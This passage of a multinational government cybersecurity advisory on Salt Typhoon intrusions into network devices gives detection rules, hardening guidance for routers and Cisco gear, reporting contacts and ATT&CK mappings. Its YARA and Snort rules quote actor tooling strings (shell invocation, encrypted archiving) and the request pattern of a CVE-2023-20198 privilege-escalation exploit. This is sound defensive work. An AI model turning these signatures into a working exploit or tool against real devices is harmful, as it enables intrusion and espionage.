<h4><strong>New2 SFTP client Yara rule </strong></h4>
<div>
<p><code>rule SALT_TYPHOON_NEW2_SFTP_CLIENT {</code></p>
<p><code>    meta:</code></p>
<p><code>        description = "Detects the Salt Typhoon New2 SFTP client. Rule is meant for threat hunting."</code></p>
<p> </p>
<p><code>    strings:</code></p>
<p><code>        $set_1_1 = "invoke_shell"</code></p>
<p><code>        $set_1_2 = "execute_commands"</code></p>
<p><code>        $set_1_3 = "cmd_file"</code></p>
<p><code>        $set_1_4 = "stop_event"</code></p>
<p><code>        $set_1_5 = "decrypt_message"</code></p>
<p><code>        $set_2_1 = "COMMANDS_FILE"</code></p>
<p><code>        $set_2_2 = "RUN_TIME"</code></p>
<p><code>        $set_2_3 = "LOG_FILE"</code></p>
<p><code>        $set_2_4 = "ENCRYPTION_PASSWORD"</code></p>
<p><code>        $set_2_5 = "FIREWALL_ADDRESS"</code></p>
<p><code>        $set_3_1 = "commands.log"</code></p>
<p><code>        $set_3_2 = "Executing command: {}"</code></p>
<p><code>        $set_3_3 = "Connecting to: {}"</code></p>
<p><code>        $set_3_4 = "Network sniffer script."</code></p>
<p><code>        $set_3_5 = "tar -czvf - {0} | openssl des3 -salt -k password -out {0}.tar.gz"</code></p>
<p><code>        $set_required = { 00 70 61 72 61 6D 69 6B 6F }</code></p>
<p> </p>
<p><code>    condition:</code></p>
<p><code>        $set_required and 4 of ($set_1_*) and 4 of ($set_2_*) </code><br><code>        and 4 of ($set_3_*)</code></p>
<p><code>}</code></p>
</div>
<table>
<caption><a class="ck-anchor"><strong>Table 7</strong></a>: sft SFTP client</caption>
<tbody>
<tr>
<th>File Name </th>
<td>sft</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe</td>
</tr>
<tr>
<th>File Type </th>
<td>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=Q_mmdNzBVit4XSJyGrtd/ampmN-03i9bT1qzD9njH/MFeCrtuGl37O7UNKFQyk/sBN-cduKnfSAvXO7jzGG, with debug_info, not stripped</td>
</tr>
</tbody>
</table>
<h4><strong>CVE 2023-20198 Snort rule</strong></h4>
<div>
<p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"Potential CVE-2023-20198 exploit attempt - HTTP Request to Add Privilege 15 User Detected"; content:"POST"; http_method; pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri; content:"&lt;request xmlns=\"urn:cisco:wsma-config\" correlator=\"execl\"&gt;"; http_client_body; content:"&lt;configApply details=\"all\"&gt;"; http_client_body; content:"&lt;config-data&gt;"; http_client_body; content:"&lt;cli-config-data-block&gt;"; http_client_body; content:"username"; http_client_body; content:"privilege 15"; http_client_body; content:"secret"; http_client_body; sid:1000003; rev:1;)</code></p>
</div>
<h2><strong>Mitigations</strong></h2>
<p>These APT actors are having considerable success using publicly known CVEs to gain access to networks, so organizations are strongly encouraged to prioritize patching in a way that is proportionate to this threat, such as by sequencing patches to address the highest risks first. See CISA’s <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog" data-entity-type="node" data-entity-uuid="79453b83-86b9-4e2f-b1ec-abf73c6eb291" data-entity-substitution="canonical">Known Exploited Vulnerabilities Catalog</a> for further information. Specifically, organizations should ensure edge devices are not vulnerable to known exploited CVEs identified in this advisory.</p>
<p>Note: This advisory uses <a href="https://d3fend.mitre.org/" target="_blank" title="MITRE D3FEND">MITRE D3FEND™</a>, version 1.2.0, cybersecurity countermeasures. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#AppC" title="Appendix C"><strong>Appendix C: MITRE D3FEND Countermeasures</strong></a> section of this advisory for a table of the mitigations mapped to MITRE D3FEND countermeasures.</p>
<h3>General recommendations</h3>
<ul>
<li>Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for the activities listed in this advisory [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM">D3-PM</a>]. In particular, check for:
<ul>
<li>Unexpected GRE or other tunneling protocols, especially with foreign infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation/" target="_blank" title="D3-NTCD">D3-NTCD</a>].</li>
<li>Unexpected external IPs set as a TACACS+ or RADIUS server, or other AAA service configuration modifications.</li>
<li>Unexpected external IPs in ACLs.</li>
<li>Unexpected packet capture or network traffic mirroring settings.</li>
<li>Unexpected virtual containers running on network devices, or, where virtual containers are expected, unexpected commands within the containers.</li>
</ul>
</li>
<li>Employ a robust change management process that includes periodic auditing of device configurations [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM">D3-PM</a>].
<ul>
<li>Ensure all networking configurations are stored, tracked, and regularly audited via a change management process. A change management process audits approved configurations against what is currently running in an organization’s infrastructure.</li>
<li>Review firewall rule creation and modification dates, cross referencing against change management approvals, to detect unauthorized rules or rule changes.</li>
<li>Create alarms or alerts for unusual router administration access, commands, or other activity.</li>
</ul>
</li>
<li>Attempt to identify the full scope of a suspected compromise before mitigating. While it is important to contain the intrusion and prevent further malicious activity, if the full scope is not identified and mitigated fully, the actors may retain access and cause further malicious activity. Threat hunting and incident response efforts should be balanced against the total potential malicious activity with the goals of full eviction and minimizing damage.
<ul>
<li>An established compromise by these APT actors will likely include recurring, large-scale exfiltration from the compromised network. In at least one instance, the APT actors utilized GRE and MPLS tunnels to move data back to China.</li>
</ul>
</li>
<li>Disable outbound connections from management interfaces to limit possible lateral movement activity between network devices [<a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a>].</li>
<li>Disable all unused ports and protocols (both traffic and management protocols) [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH</a>]. Only use encrypted and authenticated management protocols (e.g., SSH, SFTP/SCP, HTTPS) and disable all others, especially unencrypted protocols (e.g., Telnet, FTP, HTTP).</li>
<li>Change all default administrative credentials, especially for network appliances and other network devices [<a href="https://d3fend.mitre.org/technique/d3f:ChangeDefaultPassword/" target="_blank" title="D3-CFP">D3-CFP</a>].</li>
<li>Require public-key authentication for administrative roles. Disable password authentication where operationally feasible. Minimize authentication attempts and lockout windows to slow brute force and sprayed attempts [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a>].</li>
<li>Use the vendor recommended version of the network device operating system and keep it updated with all patches. Upgrade unsupported network devices to ones that are supported by the vendor with security updates [<a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a>].</li>
</ul>
<h3>Hardening management protocols and services</h3>
<ul>
<li>Implement management-plane isolation and control-plane policing (CoPP) [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>].
<ul>
<li>Place all device management services (SSH, HTTPS, SNMP, TACACS+/RADIUS, SCP/SFTP) strictly in a dedicated out-of-band management network or a management VRF.</li>
<li>Ensure this management VRF has no route leakage to customers or peering VRFs and cannot initiate or receive sessions from data-plane or peering address space [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>].</li>
<li>Block all egress from the management VRF except to explicitly authorized AAA/syslog/NetFlow/IPFIX/telemetry collectors to prevent actor use of management interfaces as lateral movement conduits or exfiltration paths.</li>
<li>Apply explicit management-plane ACLs at the control plane (e.g., CoPP/CPPr) to allowlist (i.e., default-deny) and rate-limit management protocols. Allow only approved management station IPs/subnets and jump servers.
<ul>
<li>Apply these restrictions to all SNMP, TACACS+/RADIUS (TCP/UDP 49/1812/1813), HTTPS (TCP/443 and any configured non-default port), SSH (TCP/22 and any configured non-default port), and SFTP/SCP.</li>
<li>For devices that do not support ACLs, place on a separate management Virtual Local Area Network (VLAN); an ACL can be applied to this management VLAN from an upstream device, such as a router or Layer 3 switch.</li>
</ul>
</li>
</ul>
</li>
<li>Use SSHv2 only and disable Telnet. Audit and restrict SSH on non-default ports (e.g., 22x22 and xxx22 patterns) commonly used by the APT actors.</li>
<li>If a web interface is operationally required, bind it only to the management VRF/interface. Use HTTPS only and disable unencrypted HTTP. Require AAA for web interface access. Monitor and alert on non-default high HTTPS ports (e.g., 18xxx) observed in intrusions.</li>
<li>Use SNMPv3 only, and disable SNMPv1 and SNMPv2. Configure Trusted Managers and ACLs to limit SNMP access to only trusted devices.
<ul>
<li>Change all weak and default SNMP community strings.</li>
<li>Restrict and monitor SNMP writes.</li>
<li>Enforce SNMPv3 with authPriv and apply VACM views that exclude configuration-altering MIB objects from write access. Only grant read access for required OIDs; reserve write access for tightly scoped automation accounts from approved managers.</li>
</ul>
</li>
<li>Continuously monitor SNMP SET operations and alert on changes to AAA servers, HTTP/HTTPS enablement or port changes, tunnel interfaces, SPAN/ERSPAN sessions, and routing and ACL objects. Actor tradecraft includes issuing SNMP SETs to make covert configuration changes at scale.</li>
<li>Configure only strong cryptographic cipher suites for all management protocols (e.g., SSH, SFTP, HTTPS) and reject all weak ones.</li>
<li>Enforce per-protocol rate limits (particularly for SSH, HTTPS, SNMP, TACACS+/RADIUS) to blunt credential-guessing and slow “low-and-slow" abuse of built-in functions (e.g., Embedded Packet Capture, tunnel setup) without denying legitimate admin access.</li>
<li>Eliminate unintended IPv6 management exposure.
<ul>
<li>If IPv6 is enabled, apply equivalent controls for IPv6 as for IPv4.</li>
<li>Enforce management-plane ACLs and CoPP for IPv6. Bind management services only to the management VRF/interface in IPv6.</li>
<li>Audit for IPv6-reachable management services and tunnels, as the APT actors’ infrastructure includes IPv6 addresses. </li>
</ul>
</li>
</ul>
<h3>Implementing robust logging</h3>
<ul>
<li>Ensure logging is enabled and forwarded to a centralized server. Set the trap and buffer logging levels on each device to at least syslog level “informational” (code 6) to collect all necessary information.</li>
<li>Ensure all logs sent to a centralized logging server are transmitted via a secure, authenticated, and encrypted channel (such as IPsec, TLS, or SSH tunnels). The central server should maintain immutable logs with retention periods sufficient to support cybersecurity incident response investigations and comply with applicable retention policies.</li>
<li>Enable AAA command accounting for privileged commands to record any attempts to invoke those commands.</li>
</ul>
<h3>Routing best practices</h3>
<ul>
<li>Utilize routing authentication mechanisms, when possible.</li>
<li>Protect peering and edge routing paths often abused for covert redirection.
<ul>
<li>Continuously validate static routes, policy-based routing (PBR), and VRF-leak policies at peering edges. Alert on additions that steer traffic toward non-standard GRE/IPsec endpoints or unexpected next hops.</li>
</ul>
</li>
<li>Enforce maximum-prefix limits, strict prefix/AS-path filtering, and “only-expected” communities on all external BGP (eBGP) sessions. Deny default and overly broad routes.</li>
<li>Enable TTL security (GTSM) or equivalent for eBGP to reduce off-path attack surface.</li>
<li>Require session protection (TCP-AO where supported, otherwise MD5) and monitor for BGP session resets and parameter changes from unexpected management origins.</li>
</ul>
<h3>Virtual Private Network (VPN) best practices</h3>
<ul>
<li>Delete default VPN Internet Key Exchange (IKE) policies and associated components.</li>
<li>Create IKE policies consistent with applicable requirements and guidance on cryptographic algorithm use. For U.S. National Security Systems, follow <a href="https://www.cnss.gov/CNSS/issuances/Policies.cfm" target="_blank" title="Committee on National Security Systems Policy (CNSSP) 15">Committee on National Security Systems Policy (CNSSP) 15</a> and other applicable policies:
<ul>
<li>Diffie-Hellman Group: 16 with 4096 bit Modular Exponential (MODP)</li>
<li>Diffie-Hellman Group: 20 with 384 bit Elliptic Curve Group (ECP)</li>
<li>Encryption: AES-256</li>
<li>Hashing: SHA-384 </li>
</ul>
</li>
</ul>
<h3>Cisco-specific recommendations</h3>
<ul>
<li>Disable the Cisco Smart Install feature.</li>
<li>Store credentials using strong cryptography.
<ul>
<li>Protect local credentials on Cisco networking devices using Type 8 (PBKDF2-SHA-256) where supported. Do not use Type 7 and transition from Type 5 (MD5) when possible.</li>
<li>Use Type 6 (AES) key encryption to protect stored secrets (e.g., TACACS+/RADIUS shared secrets or IKE PSKs).</li>
</ul>
</li>
<li>Disable outbound connections from the VTYs (e.g., <code>transport output none</code>). This prevents initiating SSH, Telnet, or other client sessions from the device via VTY, reducing its utility as a jump host. Monitor for any changes to this setting.</li>
<li>Audit for unexpected enablement of IOS XR host SSH (<code>sshd_operns</code>) on TCP/57722. This is disabled by default, but has been observed being enabled by actors for persistence.</li>
<li>When not required, disable the web configuration interface on applicable Cisco networking devices by running <code>no ip http server </code>and <code>no ip http secure-server</code>.
<ul>
<li>If management via a web interface is required, ensure to enable only the HTTPS management interface by running the command<code> ip http secure-server</code> and keep <code>no ip http server</code> configured to prevent unencrypted access via HTTP.</li>
</ul>
</li>
<li>Ensure a final <code>deny any any log</code> line is added to all configured ACLs. This ensures that the denied connections are logged so they could be reviewed at a later date.</li>
</ul>
<h4><strong>Mitigating Guest Shell abuse</strong></h4>
<ul>
<li>Disable Guest Shell where not operationally required.
<ul>
<li>For IOS XE, run <code>guestshell disable</code> to stop the container. Where supported, disable the IOx subsystem with <code>no iox</code> to prevent container hosting entirely. Confirm with <code>show guestshell / show iox</code>.</li>
<li>For NX-OS, run <code>guestshell disable</code> to stop the container. Use <code>guestshell destroy</code> to uninstall it and return resources to the system. Confirm with <code>show guestshell</code>.</li>
</ul>
</li>
<li>Where Guest Shell is disabled, restrict (re)enabling Guest Shell.
<ul>
<li>Enforce AAA command authorization (TACACS+/RADIUS) so only approved roles can run <code>guestshell enable</code>, <code>guestshell run bash</code> (IOS XE), <code>run guestshell</code> (NX-OS), <code>guestshell disable/destroy</code>, <code>chvrf</code>, <code>dohost</code>, or IOx-related commands.</li>
</ul>
</li>
<li>Where Guest Shell is used:
<ul>
<li>Forward container logs (e.g., journald/systemd inside Guest Shell) to your SIEM. Device syslog does not capture process activity inside the container by default.</li>
<li>Configure the VRF used by Guest Shell (management VRF on IOS XE; default VRF on NX-OS unless <code>chvrf</code> is used). Restrict egress to only required destinations (e.g., SIEM/AAA/telemetry collectors) with ACLs.</li>
<li>Perform periodic inventories and integrity checks of device storage (e.g., <code>bootflash:</code>) to detect unexpected files created from the container.</li>
<li>Create alerts for <code>guestshell disable</code> <code>/ guestshell destroy</code> and unexpected <code>chvrf</code> / <code>dohost</code> usage. Consider Cisco Embedded Event Manager (EEM) policies that snapshot state (running processes, container filesystem, storage listings) when these events occur.</li>
</ul>
</li>
</ul>
<p>Additional Cisco resources:</p>
<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x" target="_blank" title="Cisco Software Checker">Cisco Software Checker</a>: Resource to find if any known vulnerabilities affect a version of IOS that may be currently in use.</li>
<li><a href="https://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html" target="_blank" title="Cisco IOS Hardening Guide">Cisco IOS Hardening Guide</a>: Resource for IOS devices.</li>
<li><a href="https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html" target="_blank" title="Cisco IOS XE Hardening Guide">Cisco IOS XE Hardening Guide</a>: Resource for IOS XE devices.</li>
<li><a href="https://sec.cloudapps.cisco.com/security/center/tacticalresources.x#~RespondingtoaSecurityIncident" target="_blank" title="Cisco Forensic Guides">Cisco Forensic Guides</a>: Resources to verify the integrity of affected devices.</li>
<li><a href="https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html" target="_blank" title="Guide to Securing NX-OS Software Devices">Guide to Securing NX-OS Software Devices</a>: Resource if using applicable devices.</li>
</ul>
<h2><strong>Resources</strong></h2>
<p>Additional information can be found in the following publicly available guidance.</p>
<p><strong>United States resources</strong></p>
<ul>
<li>(NSA, CISA, FBI) <a href="https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF" target="_blank" title="PRC State-Sponsored Cyber Actors Exploit Network Providers and Devices">PRC State-Sponsored Cyber Actors Exploit Network Providers and Devices</a> (<strong>Note:</strong> The Telecommunications and Network Service Provider Targeting section begins on page 4. Those TTPs, router commands, and mitigations are relevant for the activity listed in this advisory.)</li>
<li>(CISA, NSA, FBI) <a href="https://www.cisa.gov/sites/default/files/2025-01/joint-guidance-enhanced-visibility-hardening-guide-for-comms-infrastructure-508c_0.pdf" title="Enhanced Visibility and Hardening Guidance for Communications Infrastructure">Enhanced Visibility and Hardening Guidance for Communications Infrastructure</a></li>
<li>(NSA) <a href="https://media.defense.gov/2022/Feb/17/2002940795/-1/-1/1/CSI_CISCO_PASSWORD_TYPES_BEST_PRACTICES_20220217.PDF" target="_blank" title="Cisco Password Types: Best Practices ">Cisco Password Types: Best Practices</a></li>
<li>(NSA) <a href="https://media.defense.gov/2019/Jul/16/2002157833/-1/-1/0/CSA-CISCO-SMART-INSTALL-PROTOCOL-MISUSE.PDF" target="_blank" title="Cisco Smart Install Protocol Misuse">Cisco Smart Install Protocol Misuse</a></li>
<li>(NSA) <a href="https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF" target="_blank" title=" Performing Out-of-Band Network Management">Performing Out-of-Band Network Management</a></li>
<li>(NSA) <a href="https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF" target="_blank" title="Network Infrastructure Security Guide">Network Infrastructure Security Guide</a></li>
<li>(CISA) <a href="https://www.cisa.gov/sites/default/files/2024-12/guidance-mobile-communications-best-practices.pdf" title="Mobile Communications Best Practice Guidance">Mobile Communications Best Practice Guidance</a></li>
</ul>
<p><strong>United Kingdom resources</strong></p>
<ul>
<li>(Legislation) <a href="https://www.legislation.gov.uk/ukpga/2021/31/contents" target="_blank" title="Telecommunications Security Act (2021) ">Telecommunications Security Act (2021)</a></li>
<li>(Technical Guidance) <a href="https://assets.publishing.service.gov.uk/media/6384d09ed3bf7f7eba1f286c/E02781980_Telecommunications_Security_CoP_Accessible.pdf" target="_blank" title=" Telecommunications Security Act (2021) Code of Practice">Telecommunications Security Act (2021) Code of Practice</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/collection/cyber-assessment-framework" target="_blank" title="Cyber Assessment Framework ">Cyber Assessment Framework</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/guidance/using-ipsec-protect-data" target="_blank" title="Guidance on using IPsec to protect data">Guidance on using IPsec to protect data</a></li>
<li>(NCSC Guidance) <a href="https://www.ncsc.gov.uk/collection/principles-for-secure-paws" target="_blank" title="Principles for secure privileged access workstations (PAWS) ">Principles for secure privileged access workstations (PAWS)</a></li>
<li>(Ofcom Guidance) <a href="https://www.ofcom.org.uk/phones-and-broadband/telecoms-infrastructure/telecoms-industry-guidance" target="_blank" title="Telecoms industry guidance">Telecoms industry guidance</a> </li>
</ul>
<p><strong>International resources</strong></p>
<ul>
<li>(Technical Specification) <a href="https://www.etsi.org/deliver/etsi_ts/103900_103999/10399401/01.01.01_60/ts_10399401v010101p.pdf" target="_blank" title=" ETSI Privileged Access Workstations: Part 1: Physical">ETSI Privileged Access Workstations: Part 1: Physical [TS 103 994-1]</a></li>
<li>(Technical Specification) <a href="https://www.etsi.org/deliver/etsi_ts/103900_103999/10399402/01.01.01_60/ts_10399402v010101p.pdf" target="_blank" title="ETSI Privileged Access Workstations: Part 2: Connectivity">ETSI Privileged Access Workstations: Part 2: Connectivity [TS 103 994-2]</a></li>
</ul>
<h2><strong>Acknowledgements</strong></h2>
<p>The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Cisco Security &amp; Trust, Cisco Talos, Crowdstrike, Google Mandiant, Google Threat Intelligence, Greynoise, Microsoft, PwC Threat Intelligence, and additional industry partners for their contribution to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p>27 August 2025, v1.0: Initial publication</p>
<p>3 September 2025, v1.1: Japan NCO name correction, added introduction in Technical details, update in Initial access to clarify example CVEs’ ordering, one IP correction and two removals. </p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><a class="ck-anchor"><strong>Contact information</strong></a></h2>
<p>The following contacts are non-exhaustive, and organizations should follow all applicable reporting requirements for a given incident or other event.</p>
<p><strong>United States organizations</strong></p>
<ul>
<li><strong>National Security Agency (NSA)</strong>
<ul>
<li>Cybersecurity Report Feedback: <a href="mailto:CybersecurityReports@nsa.gov" target="_blank" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a></li>
<li>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank" title="DIB_Defense@cyber.nsa.gov">DIB_Defense@cyber.nsa.gov</a></li>
<li>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, <a href="mailto:MediaRelations@nsa.gov" target="_blank" title="MediaRelations@nsa.gov">MediaRelations@nsa.gov</a></li>
</ul>
</li>
<li><strong>Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)</strong>
<ul>
<li>U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s <a href="https://myservices.cisa.gov/irf" title="Incident Reporting System">Incident Reporting System</a>, its 24/7 Operations Center (<a href="mailto:contact@mail.cisa.dhs.gov" target="_blank" title="contact@mail.cisa.dhs.gov">contact@mail.cisa.dhs.gov</a>, 888-282-0870, or reporting online at <a href="https://www.cisa.gov/report" target="_blank" title="report">cisa.gov/report</a>), or your <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="Local FBI Office">local FBI field office</a>.</li>
<li>Methods for initial access are a critical information gap for parties working to understand the scope, scale, and impact of these APT actors. When available, please include the following information regarding the incident:
<ul>
<li>Type of activity and types of equipment affected by or used in the activity;</li>
<li>APT actors’ tactics, techniques, and procedures (TTPs) used to conduct initial access and/or lateral movement;</li>
<li>Exfiltration infrastructure and associated techniques (Layer 2/Layer 3);</li>
<li>Passwords and associated techniques used to encrypt exfiltrated data;</li>
<li>Likely or confirmed compromised routing equipment connected to or used by government networks;</li>
<li>Insights into how the compromised devices are tasked (i.e., how is traffic of interest selected for collection/redirection);</li>
<li>Signs of compromise or persistence beyond the specific network devices themselves (e.g., additional targets, such as network operations staff, IT/corporate email, etc.).</li>
<li>Date, time, and location of the incident;</li>
<li>Number of people affected;</li>
<li>Name of the submitting company or organization; and</li>
<li>Designated point of contact.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Department of Defense Cyber Crime Center (DC3)</strong>
<ul>
<li>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DC3.DCISE@us.af.mil" target="_blank" title=" DC3.DCISE@us.af.mil">DC3.DCISE@us.af.mil</a></li>
<li>Media Inquiries / Press Desk: <a href="mailto:DC3.Information@us.af.mil" target="_blank" title="DC3.Information@us.af.mil">DC3.Information@us.af.mil</a></li>
</ul>
</li>
</ul>
<p><strong>Australian organizations</strong></p>
<ul>
<li>Visit <a href="https://www.cyber.gov.au/" target="_blank" title="cyber.gov.au">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</li>
</ul>
<p><strong>Canadian organizations</strong></p>
<ul>
<li>Report incidents by emailing CCCS at <a href="mailto:contact@cyber.gc.ca" target="_blank" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</li>
<li>Canadian Security Intelligence Service (CSIS) Media Inquiries / Press Desk: <a href="mailto:media-medias@smtp.gc.ca" target="_blank" title="media-medias@smtp.gc.ca">media-medias@smtp.gc.ca</a> </li>
</ul>
<p><strong>New Zealand organizations</strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ): <a href="mailto:info@ncsc.govt.nz" target="_blank" title="info@ncsc.govt.nz">info@ncsc.govt.nz</a>.</li>
</ul>
<p><strong>United Kingdom organizations</strong></p>
<ul>
<li><strong>UK National Cyber Security Centre (NCSC)</strong>
<ul>
<li>The NCSC—a part of intelligence, security, and cyber agency GCHQ—is the UK’s technical authority on cyber security. UK organizations should report significant cyber security incidents via <a href="https://report.ncsc.gov.uk/" target="_blank" title="https://report.ncsc.gov.uk">https://report.ncsc.gov.uk/</a> (monitored 24/7).</li>
</ul>
</li>
<li><strong>Ofcom</strong>
<ul>
<li>Ofcom is the UK’s communications regulator and is responsible for enforcing the telecoms security provisions in the Communications Act (2003) and the Telecommunications Security Act (2021). Guidance and contact information on standards, specifications, and other requirements for the UK telecoms industry can be found at <a href="https://www.ofcom.org.uk/" target="_blank" title=" https://www.ofcom.org.uk">https://www.ofcom.org.uk</a>.</li>
<li>For general inquiries: <a href="mailto:networksecurityenquiries@ofcom.org.uk" target="_blank" title="networksecurityenquiries@ofcom.org.uk">networksecurityenquiries@ofcom.org.uk</a></li>
<li>For incident reports: <a href="mailto:incident@ofcom.org.uk" target="_blank" title="incident@ofcom.org.uk">incident@ofcom.org.uk</a> </li>
</ul>
</li>
</ul>
<p><strong>Czech Republic organizations</strong></p>
<ul>
<li>National Cyber and Information Security Agency (NÚKIB): <a href="mailto:cert.incident@nukib.gov.cz" target="_blank" title="cert.incident@nukib.gov.cz">cert.incident@nukib.gov.cz</a>.</li>
</ul>
<p><strong>Finnish organizations</strong></p>
<ul>
<li>Finnish Security and Intelligence Service (SUPO): <a href="https://supo.fi/en/contact" target="_blank" title="Finnish Security and Intelligence Service (SUPO) Contact">https://supo.fi/en/contact</a> </li>
</ul>
<p><strong>Germany organizations</strong></p>
<ul>
<li>Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30, <a href="mailto:pressestelle@bnd.bund.de" target="_blank" title="pressestelle@bnd.bund.de">pressestelle@bnd.bund.de</a></li>
<li>BfV Prevention/Economic Protection Unit: +49 30 18792-3322, <a href="mailto:wirtschaftsschutz@bfv.bund.de" target="_blank" title=" wirtschaftsschutz@bfv.bund.de">wirtschaftsschutz@bfv.bund.de</a></li>
<li>BSI Service-Center: +49 800 274 1000, <a href="mailto:service-center@bsi.bund.de" target="_blank" title="service-center@bsi.bund.de">service-center@bsi.bund.de</a></li>
</ul>
<p><strong>Italian organizations</strong> </p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE): Visit <a href="https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aise" target="_blank" title="Italian External Intelligence and Security Agency (AISE)">https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aise</a>.</li>
<li>Italian Internal Intelligence and Security Agency (AISI): Visit <a href="https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aisi" target="_blank" title="Italian Internal Intelligence and Security Agency (AISI">https://www.sicurezzanazionale.gov.it/chi-siamo/organizzazione/aisi</a>.</li>
</ul>
<p><strong>Japanese organizations</strong></p>
<ul>
<li>National Cybersecurity Office (NCO): <a href="mailto:first-team@cyber.go.jp" target="_blank" title="first-team@cyber.go.jp">first-team@cyber.go.jp</a></li>
</ul>
<p><strong>Polish organizations</strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW): <a href="mailto:CTIteam@aw.gov.pl" target="_blank" title="CTIteam@aw.gov.pl">CTIteam@aw.gov.pl</a></li>
<li>Polish Military Counterintelligence Service (SKW): <a href="mailto:cyber.int@skw.gov.pl" target="_blank" title="cyber.int@skw.gov.pl">cyber.int@skw.gov.pl</a></li>
</ul>
<h2><a class="ck-anchor"><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong></a></h2>
<p>See <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table8" title="Table 8"><strong>Table 8</strong></a><strong> </strong>through <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table20" title="Table 20"><strong>Table 20</strong></a><strong> </strong>for all the threat actor tactics and techniques referenced in this advisory.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"><strong>Table 8</strong></a>: Reconnaissance</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Active Scanning</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1595/" target="_blank" title="T1595">T1595</a></td>
<td>Actively scan for open ports and services</td>
</tr>
<tr>
<td>Gather Victim Network Information: Network Topology</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1590/004/" target="_blank" title="T1590.004">T1590.004</a></td>
<td>Leverage configuration files from exploited devices to gather the network topology information</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><strong>Table 9</strong>: Resource Development</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Servers</td>
